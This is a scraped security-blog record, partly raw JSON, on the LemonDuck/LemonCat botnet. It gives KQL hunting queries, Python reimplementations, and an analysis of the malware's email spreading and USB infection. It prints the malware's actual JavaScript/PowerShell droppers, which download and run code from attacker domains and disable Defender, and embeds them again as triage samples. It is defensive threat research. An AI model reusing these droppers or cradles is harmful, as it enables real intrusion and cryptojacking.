[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEALWQzUrEQBCE6yz4DiEnF0SfwIP4A6IsguBVQja4wyaTMBN_FsRn97M2u6LeBBl6plPdVV2dczV6VlDNe6uk3lnmXIA3ihrJ97WnNxV60RIsEYWuqAWqQZXvqMcfCpegLfmcjs6cE71zl-h0nnkE-kqUf5xwRt5xKmoL3bjnk7kEyXrgbjkH6A_mLfQEd_w2p9QhEXceW1RWO7yeNAqY0foZ_gbbdByD9a6MVqw8IfjvlZr922ZRa292bWSwdrbz9eSswkNlv1_fw5Rn-mp2SvaxZTTGt_2n3inonkj05gmf4y1R6akXuvulNNMH1HgRaFYCAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName =~ \"wmic.exe\" \n| where InitiatingProcessCommandLine has_all(\"product where\",\"name like\",\"call uninstall\",\"/nointeractive\") \n| where InitiatingProcessCommandLine has_any(\"Kaspersky\",\"avast\",\"avp\",\"security\",\"eset\",\"AntiVirus\",\"Norton Security\")`\n\n**Known LemonDuck component script installations**\n\nLooks for instances of the callback actions which attempt to obfuscate detection while downloading supporting scripts such as those that enable the \u201cKiller\u201d and \u201cInfection\u201d functions for the malware, as well as the mining components and potential secondary functions. Options for more specific matches are included to account for environments with potential false positives. The most general version is intended to account for minor script or component changes, such as switching to non-.bin files or uncommon components. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAN2QzWrCUBCFz1roO1xctSC60p2rVlEQ8Q0kJrYJJlGS-Ac-vN8dA9rgwm3LMHcm58zPmXxprYMShcSFCm0tK7ER-Fq5KvI3tXSR01ExWIE7TeES2ESBvbl-GhPGoCn5nIrMenyV07va2lF3tFmlzUyxLvGEt9XBQ3qiB-zjqYpXdHySZ1gAF2lmNb43Bim15PXbvaoePQ4uhNuSVcw513oiU5xTvwdNNaxxr7LfqEmJAV-RaQpq9qZjR3_Fjoltj-0yB1Pw-gv__j2e62pluu7X_Z_bNsy83-eRRN8NJNPg1z-4At8RQUloAwAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName in (\"powershell.exe\",\"cmd.exe\") \n| where InitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\") or \nInitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\",\".bin\") or \nInitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\",\"kr.bin\",\"if.bin\",\"m6.bin\")`\n\n**LemonDuck named scheduled task creation**\n\nLooks for instances where LemonDuck creates statically named scheduled tasks, or for the semi-unique task creation pattern LemonDuck also uses: launching hidden PowerShell processes under randomly generated task names. An example of a randomly generated one is: \"schtasks.exe\" /create /ru system /sc MINUTE /mo 60 /tn fs5yDs9ArkV\\2IVLzNXfZV/F /tr \"powershell -w hidden -c PS_CMD\". 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWS0WrCQBBF77PgPyx5UrD6BX3S-mRLwQ8o2ygoGpXdtGlB_PaenSQlFV-kLLO53Jmde3eyM631qa1yvq8KOhqKrCf4tQ4qwX31dJZTpQ1cIJzmnNqDXuRVGPOoC3tGfU5dCR-1I8Zkv4jsZp-_qlNwwfIor7RA42BVG-s2oMeE2nTSo5B6Dv_d9c3476Z7CXZ6526e8zuQB-_Jja7yH-bAX2WCTcybM4duYE8O73WUNG_dt9YKqNc44jxarvjNpj_Q4gKlrsMWzztsaPCJ2spmGG2WyYPTA1xytsXpyt5E4nKb8hKvUz1rZvf9AWK9PVhOAgAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where FileName =~ \"schtasks.exe\" \n| where ProcessCommandLine has(\"/create\") \n| where ProcessCommandLine has_any(\"/tn blackball\",\"/tn blutea\",\"/tn rtsa\") or \nProcessCommandLine has_all(\"/create\",\"/ru\",\"system\",\"/sc\",\"/mo\",\"/tn\",\"/F\",\"/tr\",\"powershell -w hidden -c PS_CMD\")`\n\n**Competition killer script scheduled task execution**\n\nLooks for instances of the LemonDuck component KR.Bin, which is intended to kill competition prior to making the installation and persistence of the malware concrete. The killer script used is based on historical versions from 2018 and earlier, which have grown over time to include scheduled task and service names of various botnets, malware, and other competing services. The version currently in use by LemonDuck has approximately 40-60 scheduled task names. The upper maximum in this query can be modified and adjusted to include time bounding. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJWRT0_CQBDF35nE79D0BAkRDhw4oBeqCQbUxD_XBguxhlpMW8EaP7y_HQppiATMZmZnZt_MvLwNNNdKb4q475VpaVHOuaI-V6qC-EwN_cjTWjG1DPP20EPid86UjpnGTEwNFVPJFeITTlM-WUS1sPoCOwf3hflqYx0FxAlW1GqPut3F1_jWjlGuz2pvxs5v2-myBVHIq5vTPIlri84XlfigpskIxHaX41mYJrMKteX5zMTEmLj9F5jjk-FLWCTW8woyhsuGU3gip7-U_8-E-g-ksHE_MOHOyTeKPtDnuJZVfme8I2Pt6YZ4hXl60gdzp7V_WaKyf4DjYXUuTZ-euqbSMS0Hhu6D_gUG3Q8GqgIAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where ProcessCommandLine has_all(\"schtasks.exe\",\"/Delete\",\"/TN\",\"/F\") \n| summarize make_set(ProcessCommandLine) by DeviceId \n| extend DeleteVolume = array_length(set_ProcessCommandLine) \n| where set_ProcessCommandLine has_any(\"Mysa\",\"Sorry\",\"Oracle Java Update\",\"ok\") \n| where DeleteVolume >= 40 and DeleteVolume <= 80`\n\n**LemonDuck hosts file adjustment for dynamic C2 downloads**\n\nLooks for a PowerShell event wherein LemonDuck attempts to simultaneously retrieve the IP address of a C2 and modify the hosts file with the retrieved address. The address is then attributed to a name that does not exist and is randomly generated. The script then instructs the machine to download data from that address. This query has a more general and a more specific clause, allowing the detection of this technique if other activity groups were to utilize it. 
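The four hunting queries in this section (the echoed download loop, the named scheduled-task creation, the competition-killer burst of task deletions, and the hosts-file manipulation whose query follows) re-implemented in plain Python over constructed rows shaped like DeviceProcessEvents, so the matching logic can be exercised offline. This is an added example, not code from the post: the device names, command lines and thresholds in the sample rows are constructed for illustration, and KQL's term-based `has` is approximated with substring matching, which over-matches slightly.

```python
"""Plain-Python re-implementation of the four LemonDuck hunting queries above.
Added example, not code from the Microsoft post; runs over constructed rows
shaped like DeviceProcessEvents so the logic can be tested offline. KQL `has`
matches whole terms, so the substring checks here over-match slightly (worst
for the short "ok" term in the killer-script query)."""
from collections import defaultdict


def has_all(text, terms):
    """Approximates KQL has_all: every term present, case-insensitive."""
    return all(t.lower() in text.lower() for t in terms)


def has_any(text, terms):
    """Approximates KQL has_any: at least one term present, case-insensitive."""
    return any(t.lower() in text.lower() for t in terms)


def hunt_download_script(events):
    """Query 1: echoed try{...} download loop launched from cmd/powershell.
    The two longer OR branches of the original are subsets of this one."""
    needles = ("/c echo try", "down_url=", "md5", "downloaddata", "ComputeHash")
    return sorted({e["DeviceId"] for e in events
                   if e["InitiatingProcessFileName"].lower() in ("powershell.exe", "cmd.exe")
                   and has_all(e["InitiatingProcessCommandLine"], needles)})


def hunt_named_scheduled_task(events):
    """Query 2: the static task names, or the hidden-PowerShell task template."""
    static = ("/tn blackball", "/tn blutea", "/tn rtsa")
    template = ("/create", "/ru", "system", "/sc", "/mo", "/tn", "/F", "/tr",
                "powershell -w hidden -c PS_CMD")
    return sorted({e["DeviceId"] for e in events
                   if e["FileName"].lower() == "schtasks.exe"
                   and "/create" in e["ProcessCommandLine"].lower()
                   and (has_any(e["ProcessCommandLine"], static)
                        or has_all(e["ProcessCommandLine"], template))})


def hunt_competition_killer(events, low=40, high=80):
    """Query 3: a burst of distinct `schtasks /Delete` commands on one device that
    names a known competitor. low/high are the bounds the post says to tune."""
    per_device = defaultdict(set)
    for e in events:
        if has_all(e["ProcessCommandLine"], ("schtasks.exe", "/Delete", "/TN", "/F")):
            per_device[e["DeviceId"]].add(e["ProcessCommandLine"])
    names = ("Mysa", "Sorry", "Oracle Java Update", "ok")
    return sorted(dev for dev, cmds in per_device.items()
                  if low <= len(cmds) <= high and any(has_any(c, names) for c in cmds))


def hunt_hosts_file_c2(events):
    """Query 4: resolve a C2, write it into the hosts file, then download from it."""
    needles = ("GetHostAddresses", "etc", "hosts")
    return sorted({e["DeviceId"] for e in events
                   if e["InitiatingProcessFileName"].lower() == "powershell.exe"
                   and has_all(e["InitiatingProcessCommandLine"], needles)})


def _event(device, file_name, cmd, parent="explorer.exe", parent_cmd="explorer.exe"):
    return {"DeviceId": device, "FileName": file_name, "ProcessCommandLine": cmd,
            "InitiatingProcessFileName": parent, "InitiatingProcessCommandLine": parent_cmd}


# Constructed sample telemetry (not real captures); command lines are modelled on
# the snippets quoted in the post, device names are placeholders.
SAMPLE_EVENTS = [
    _event("ws01", "powershell.exe", "powershell -w hidden -c ...", parent="cmd.exe",
           parent_cmd='cmd /c echo try{$down_url="http://t.zz3r0.com";$md5="...";'
                      '$d=(New-Object Net.WebClient).DownloadData($down_url+"/kr.bin");'
                      '[Security.Cryptography.MD5]::Create().ComputeHash($d)}catch{}'),
    _event("ws01", "schtasks.exe", '"schtasks.exe" /create /ru system /sc MINUTE /mo 60 '
           '/tn blackball /tr "powershell -w hidden -c PS_CMD" /F'),
    _event("ws03", "schtasks.exe", '"schtasks.exe" /create /ru system /sc MINUTE /mo 60 '
           '/tn fs5yDs9ArkV\\2IVLzNXfZV /F /tr "powershell -w hidden -c PS_CMD"'),
    _event("ws04", "powershell.exe", "powershell -w hidden -c ...", parent="powershell.exe",
           parent_cmd="powershell -w hidden -c $ip=[Net.Dns]::GetHostAddresses('t.zz3r0.com')"
                      "[0].IPAddressToString;Add-Content C:\\Windows\\System32\\drivers\\etc\\hosts"
                      " ($ip+' '+$fake);(New-Object Net.WebClient).DownloadData('http://'+$fake+'/a.jsp')"),
    # Benign noise: an admin creating one daily task that runs a script.
    _event("ws05", "schtasks.exe", 'schtasks /create /tn Backup /sc daily /tr "powershell -File C:\\bk.ps1"'),
]
# Killer script on ws02: 45 distinct deletions, three of them known competitor names.
SAMPLE_EVENTS += [_event("ws02", "schtasks.exe", f'schtasks.exe /Delete /TN "{name}" /F')
                  for name in ["Mysa", "Sorry", "Oracle Java Update"] + [f"task{i}" for i in range(42)]]

if __name__ == "__main__":
    for hunt in (hunt_download_script, hunt_named_scheduled_task,
                 hunt_competition_killer, hunt_hosts_file_c2):
        print(hunt.__name__, hunt(SAMPLE_EVENTS))
```

The benign `ws05` row shows why the template branch of query 2 demands the whole `/ru system /sc /mo /tn /F /tr` shape rather than any task that runs PowerShell; in the KQL itself the cardinality bounds of query 3 are doing most of the work, because the literal `"ok"` in its `has_any` matches far more than the competitor names do.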
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAMWQuwrCYAyFzyz4DqWTgvgGDmK9gYigu5S22IK20op18OH9Erro4OAiIZc_OTknbaRMdxVKyDvVqrxqsDn9TKVu1H319FSgVjm9Gg-0ZlYwLRR7LHX6YFjQPVNvQVx8Z4IFCnUF1TpT44xnbEx-4OGPajPqCxYzS7VxjG3mdBodiaYygH9J_6YV-IY8BZ26irFYDDXCDZN0dd5hbTaE0y6s2PnHXWv432cHNvZs1J3-9_vtHfn_L9Gt0E952_Wxf90Lt1_r6hICAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"powershell.exe\" \n| where InitiatingProcessCommandLine has_all(\"GetHostAddresses\",\"etc\",\"hosts\") \nor InitiatingProcessCommandLine has_all(\"GetHostAddresses\",\"IPAddressToString\",\"etc\",\"hosts\",\"DownloadData\")`\n\n \n\n[Learn how your organization can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>).\n\n \n\nThe post [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T19:00:59", "type": "mmpc", "title": "When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-29T19:00:59", "id": "MMPC:4A6B394DCAF12E05136AE087248E228C", "href": "https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-30T00:39:50", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. Part 1 covers the evolution of the threat, how it spreads, and how it impacts organizations. [Part 2](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) is a deep dive on the attacker behavior and will provide investigation guidance.] _\n\nCombating and preventing today's threats to enterprises require comprehensive protection focused on addressing the full scope and impact of attacks. Anything that can gain access to machines\u2014even so-called commodity malware\u2014can bring in more dangerous threats. We\u2019ve seen this in banking Trojans serving as entry point for ransomware and hands-on-keyboard attacks. LemonDuck, an actively updated and robust malware that\u2019s primarily known for its botnet and cryptocurrency mining objectives, followed the same trajectory when it adopted more sophisticated behavior and escalated its operations. 
Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.\n\nLemonDuck\u2019s threat to enterprises is also in the fact that it\u2019s a cross-platform threat. It\u2019s one of a few documented bot malware families that targets Linux systems as well as Windows devices. It uses a wide range of spreading mechanisms\u2014phishing emails, exploits, USB devices, brute force, among others\u2014and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns. For example, in 2020, it was observed using COVID-19-themed lures in email attacks. In 2021, it exploited newly patched [Exchange Server vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/>) to gain access to outdated systems.\n\nThis threat, however, does not just limit itself to new or popular vulnerabilities. It continues to use older vulnerabilities, which benefit the attackers at times when focus shifts to patching a popular vulnerability rather than investigating compromise. Notably, LemonDuck removes other attackers from a compromised device by getting rid of competing malware and preventing any new infections by patching the same vulnerabilities it used to gain access.\n\nIn the early years, LemonDuck targeted China heavily, but its operations have since expanded to include many other countries, focusing on the manufacturing and IoT sectors. Today, LemonDuck impacts a very large geographic range, with the United States, Russia, China, Germany, the United Kingdom, India, Korea, Canada, France, and Vietnam seeing the most encounters.\n\n\n\n_Figure 1. 
Global distribution of LemonDuck botnet activity_\n\nIn 2021, LemonDuck campaigns started using more diversified command and control (C2) infrastructure and tools. This update supported the marked increase in hands-on-keyboard actions post-breach, which varied depending on the perceived value of compromised devices to the attackers. Despite all these upgrades, however, LemonDuck still utilizes C2s, functions, script structures, and variable names for far longer than the average malware. This is likely due to its use of bulletproof hosting providers such as Epik Holdings, which are unlikely to take any part of the LemonDuck infrastructure offline even when reported for malicious actions, allowing LemonDuck to persist and continue to be a threat.\n\nIn-depth research into malware infrastructures of various sizes and operations provides invaluable insight into the breadth of threats that organizations face today. In the case of LemonDuck, the threat is cross-platform, persistent, and constantly evolving. Research like this emphasizes the importance of having comprehensive visibility into the wide range of threats, as well as the ability to correlate simple, disparate activity such as coin mining to more dangerous adversarial attacks.\n\n## LemonDuck and LemonCat infrastructure\n\nThe earliest documentation of LemonDuck was from its cryptocurrency campaigns in May 2019. These campaigns included PowerShell scripts that employed additional scripts kicked off by a scheduled task. The task was used to bring in the PCASTLE tool to achieve a couple of goals: abuse the EternalBlue SMB exploit, as well as use brute force or pass-the-hash to move laterally and begin the operation again. Many of these behaviors are still observed in LemondDuck campaigns today.\n\nLemonDuck is named after the variable \u201cLemon_Duck\u201d in one of the said PowerShell scripts. The variable is often used as the user agent, in conjunction with assigned numbers, for infected devices. 
The format used two sets of alphabetical characters separated by dashes, for example: \u201cUser-Agent: Lemon-Duck-[A-Z]-[A-Z]\u201d. The term still appears in PowerShell scripts, as well as in many of the execution scripts, specifically in a function called SIEX, which is used to assign a unique user-agent during botnet connection in attacks as recently as June 2021.\n\nLemonDuck frequently utilizes open-source material built off of resources also used by other botnets, so there are many components of this threat that would seem familiar. Microsoft researchers are aware of two distinct operating structures, which both use the LemonDuck malware but are potentially operated by two different entities for separate goals.\n\nThe first, which we call the \u201cDuck\u201d infrastructure, uses historical infrastructures discussed in this report. It is highly consistent in running campaigns and performs limited follow-on activities. This infrastructure is seldom seen in conjunction with edge device compromise as an infection method, and is more likely to have random display names for its C2 sites, and is always observed utilizing \u201cLemon_Duck\u201d explicitly in script.\n\nThe second infrastructure, which we call \u201cCat\u201d infrastructure\u2014for primarily using two domains with the word \u201ccat\u201d in them (_sqlnetcat[.]com_, _netcatkit[.]com_)\u2014emerged in January 2021. It was used in attacks exploiting vulnerabilities in Microsoft Exchange Server. Today, the Cat infrastructure is used in attacks that typically result in backdoor installation, credential and data theft, and malware delivery. 
It is often seen delivering the malware Ramnit.\n\n \n\n**Sample Duck domains** | **Sample Cat domains** \n---|--- \n \n * cdnimages[.]xyz\n * bb3u9[.]com\n * zz3r0[.]com\n * pp6r1[.]com\n * amynx[.]com\n * ackng[.]com\n * hwqloan[.]com\n * js88[.]ag\n * zer9g[.]com\n * b69kq[.]com\n| \n\n * sqlnetcat[.]com\n * netcatkit[.]com\n * down[.]sqlnetcat[.]com\n\n \n \nThe Duck and Cat infrastructures use similar subdomains, and they use the same task names, such as \u201cblackball\u201d. Both infrastructures also utilize the same packaged components hosted on similar or identical sites for their mining, lateral movement, and competition-removal scripts, as well as many of the same function calls.\n\nThe fact that the Cat infrastructure is used for more dangerous campaigns does not deprioritize malware infections from the Duck infrastructure. Instead, this intelligence adds important context for understanding this threat: the same set of tools, access, and methods can be re-used at dynamic intervals, to greater impact. Despite common implications that cryptocurrency miners are less threatening than other malware, its core functionality mirrors non-monetized software, making any botnet infection worthy of prioritization.\n\n\n\n_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_\n\n## Initial access\n\nLemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns.\n\nLemonDuck acts as a loader for many other follow-on activities, but one if its main functions is to spread by compromising other systems. 
Since its first appearance, the LemonDuck operators have leveraged scans against both Windows and Linux devices for open or weakly authenticated SMB, Exchange, SQL, Hadoop, REDIS, RDP, or other edge devices that might be vulnerable to password spray or application vulnerabilities like CVE-2017-0144 (EternalBlue), CVE-2017-8464 (LNK RCE), CVE-2019-0708 (BlueKeep), CVE-2020-0796 (SMBGhost), CVE-2021-26855 (ProxyLogon), CVE-2021-26857 (ProxyLogon), CVE-2021-26858 (ProxyLogon), and CVE-2021-27065 (ProxyLogon).\n\nOnce inside a system with an Outlook mailbox, as part of its normal exploitation behavior, LemonDuck attempts to run a script that utilizes the credentials present on the device. The script instructs the mailbox to send copies of a phishing message with preset messages and attachments to all contacts.\n\nBecause of this method of contact messaging, security controls that rely on determining if an email is sent from a suspicious sender don\u2019t apply. This means that email security policies that reduce scanning or coverage for internal mail need to be re-evaluated, as sending emails through contact scraping is very effective at bypassing email controls.\n\nFrom mid-2020 to March 2021, LemonDuck\u2019s email subjects and body content have remained static, as have the attachment names and formats. 
These attachment names and formats have changed very little from similar campaigns that occurred in early 2020.\n\n \n\n**Sample email subjects ** | **Sample email body content** \n---|--- \n \n * The Truth of COVID-19\n * COVID-19 nCov Special info WHO\n * HALTH ADVISORY:CORONA VIRUS\n * WTF\n * What the fcuk\n * good bye\n * farewell letter\n * broken file\n * This is your order?\n| \n\n * Virus actually comes from United States of America\n * very important infomation for Covid-19\n * see attached document for your action and discretion.\n * the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future.\n * what's wrong with you?are you out of your mind!!!!!\n * are you out of your mind!!!!!what 's wrong with you?\n * good bye, keep in touch\n * can you help me to fix the file,i can't read it\n * file is brokened, i can't open it \n \nThe attachment used for these lures is one of three types: .doc, .js, or a .zip containing a .js file. Whatever the type, the file is named \u201creadme\u201d. Occasionally, all three types are present in the same email.\n\n\n\n_Figure 3. Sample email_\n\nWhile the JavaScript is detected by many security vendors, it might be classified with generic detection names. It could be valuable for organizations to sanitize JavaScript or VBScript executing or calling prompts (such as PowerShell) directly from mail downloads through solutions such as [custom detection rules](<https://docs.microsoft.com/en-us/microsoft-365/security/defender/custom-detection-rules?view=o365-worldwide>).\n\nSince LemonDuck began operating, the .zip to .js file execution method is the most common. The JavaScript has replaced the scheduled task that LemonDuck previously used to kickstart the PowerShell script. This PowerShell script has looked very similar throughout 2020 and 2021, with minor changes depending on the version, indicating continued development. 
Below is a comparison of changes from the most recent iterations of the email-delivered downloads and those from April of 2020.\n\n \n\n**April 2020 PowerShell script** | **March 2021 PowerShell script** \n---|--- \n`var cmd =new ActiveXObject(\"WScript.Shell\");var cmdstr=\"cmd /c start /b notepad \"+WScript.ScriptFullName+\" & powershell -w hidden -c \\\"if([Environment]::OSVersion.version.Major -eq '10'){Set-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Value 'cmd /c powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1 & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Major) &::';sleep 1;schtasks /run /tn \\\\Microsoft\\\\Windows\\\\DiskCleanup\\\\SilentCleanup /I;Remove-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Force}else{IEx(ne`w-obj`ect Net.WebC`lient).DownloadString('http://t.awcna.com/7p.php');bpu -method migwiz -Payload 'powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Majo \n//This File is broken.` | `var cmd =new ActiveXObject(\"WScript.Shell\");var cmdstr=\"cmd /c start /b notepad \"+WScript.ScriptFullName+\" & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'z3r0.com/7p.php?0.7*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'z3r0.com/mail.jsp?js_0.7')\";cmd.run(cmdstr,0,1); \n//This File is broken.` \n \n \n\nAfter the emails are sent, the inbox is cleaned to remove traces of these mails. This method of self-spreading is attempted on any affected device that has a mailbox, regardless of whether it is an Exchange server.\n\nOther common methods of infection include movement within the compromised environment, as well as through USB and connected drives. 
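An offline triage helper for the two readme.js droppers compared above, as an added example (not code from the post, and not LemonDuck's own tooling). It undoes the two cheap obfuscations visible in the samples, PowerShell backtick splitting such as Ne`w-Obj`ect and single-quote string concatenation such as 'http://t.z'+'z3r0.com', then reports the behaviours the text calls out: hidden PowerShell, the notepad decoy, the WebClient download cradle, Defender real-time monitoring being switched off, and the URLs contacted. The two sample strings are the scripts printed in the table above, de-escaped, with the April 2020 one cut off where the table cuts it off; the function names and the set of indicator checks are the example's own.

```python
"""Static triage of the readme.js dropper variants quoted in the post.
Added example; the two samples are the scripts from the post's comparison table."""
import re

# Backticks not followed by a classic Windows PowerShell escape (`n `t `r `0 `a `b `f `v)
# carry no meaning and only break up cmdlet names for signature evasion.
_BACKTICK_NOISE = re.compile(r"`(?![ntr0abfv])")
# 'abc'+'def' inside a PowerShell expression -> 'abcdef'
_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
_URL = re.compile(r"https?://[^\s'\"()]+")


def strip_backticks(text):
    """Ne`w-Obj`ect Net.WebC`lient -> New-Object Net.WebClient"""
    return _BACKTICK_NOISE.sub("", text)


def join_string_concat(text):
    """Collapse chained single-quoted literal concatenations until stable."""
    while True:
        new = _CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", text)
        if new == text:
            return new
        text = new


def analyse_dropper(js):
    """Return the indicators an analyst wants confirmed for one dropper."""
    ps = join_string_concat(strip_backticks(js))
    low = ps.lower()
    return {
        "urls": sorted(set(_URL.findall(ps))),
        "hidden_powershell": "powershell -w hidden" in low,
        "notepad_decoy": "start /b notepad" in low,
        "download_cradle": "net.webclient" in low and "downloadstring" in low,
        "disables_defender": "set-mppreference -disablerealtimemonitoring" in low,
        "backtick_obfuscation": "`" in js,
    }


# Samples as printed in the post (April 2020 truncated there at "Majo").
APRIL_2020 = r"""var cmd =new ActiveXObject("WScript.Shell");var cmdstr="cmd /c start /b notepad "+WScript.ScriptFullName+" & powershell -w hidden -c \"if([Environment]::OSVersion.version.Major -eq '10'){Set-ItemProperty -Path 'HKCU:\Environment' -Name 'windir' -Value 'cmd /c powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1 & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Major) &::';sleep 1;schtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I;Remove-ItemProperty -Path 'HKCU:\Environment' -Name 'windir' -Force}else{IEx(ne`w-obj`ect Net.WebC`lient).DownloadString('http://t.awcna.com/7p.php');bpu -method migwiz -Payload 'powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Majo"""

MARCH_2021 = r"""var cmd =new ActiveXObject("WScript.Shell");var cmdstr="cmd /c start /b notepad "+WScript.ScriptFullName+" & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'z3r0.com/7p.php?0.7*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'z3r0.com/mail.jsp?js_0.7')";cmd.run(cmdstr,0,1);"""

if __name__ == "__main__":
    for label, sample in (("April 2020", APRIL_2020), ("March 2021", MARCH_2021)):
        print(label, analyse_dropper(sample))
```

Running it shows the shift the text describes: the 2020 dropper still carries the inline `Set-MpPreference -DisableRealtimeMonitoring 1` and the t.awcna.com URLs, while the 2021 dropper has moved the Defender tampering out of the stage-one script and hides the zz3r0.com domain behind concatenation. The concat collapse only handles single-quoted literals, which is the style these samples use; double-quoted strings, `-join` or the format operator would need their own rules.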
These processes are often kicked off automatically and have occurred consistently throughout the entirety of LemonDuck\u2019s operation.\n\nThese methods run as a series of C# scripts that gather available drives for infection. They also create a running list of drives that are already infected based on whether it finds the threat already installed. Once checked against the running list of infected drives, these scripts attempt to create a set of hidden files in the home directory, including a copy of _readme.js_. Any device that has been affected by the LemonDuck implants at any time could have had any number of drives attached to it that are compromised in this manner. This makes this behavior a possible entry vector for additional attacks.\n\n`DriveInfo[] drives = DriveInfo.GetDrives(); \nforeach (DriveInfo drive in drives) \n{ \nif (blacklist.Contains(drive.Name)) \n{ continue;} \nConsole.WriteLine(\"Detect drive:\"+drive.Name); \nif (IsSupported(drive)) \n{ \nif (!File.Exists(drive + home + inf_data)) \n{ \nConsole.WriteLine(\"Try to infect \"+drive.Name); \nif (CreateHomeDirectory(drive.Name) && Infect(drive.Name)) \n{ \nblacklist.Add(drive.Name); \n} \n} \nelse { \nConsole.WriteLine(drive.Name+\" already infected!\"); \nblacklist.Add(drive.Name); \n} \n} \nelse{ \nblacklist.Add(drive.Name);`\n\n## Comprehensive protection against a wide-ranging malware operation\n\nThe cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Microsoft 365 Defender has AI-powered industry-leading protections that can stop multi-component threats like LemonDuck across domains and across platforms. Microsoft 365 Defender for Office 365 detects the malicious emails sent by the LemonDuck botnet to deliver malware payloads as well as spread the bot loader. 
